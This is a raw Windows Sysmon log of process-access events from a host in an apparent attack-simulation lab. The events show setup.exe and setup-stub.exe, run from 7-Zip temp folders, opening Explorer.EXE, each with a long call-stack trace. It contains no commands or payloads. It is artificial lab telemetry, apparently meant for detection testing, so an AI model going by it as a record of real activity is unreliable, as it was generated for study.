13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64) 10341000x800000000000000016608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64) 10341000x800000000000000016607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64) 10341000x800000000000000016605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64)|C:\Windows\System32\SHELL32.dll+169f5d(wow64) 10341000x800000000000000016604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64)|C:\Windows\System32\SHELL32.dll+169f5d(wow64) 10341000x800000000000000016603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64) 10341000x800000000000000016602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64) 10341000x800000000000000016601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64) 10341000x800000000000000016598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64) 10341000x800000000000000016596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64) 10341000x800000000000000016595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 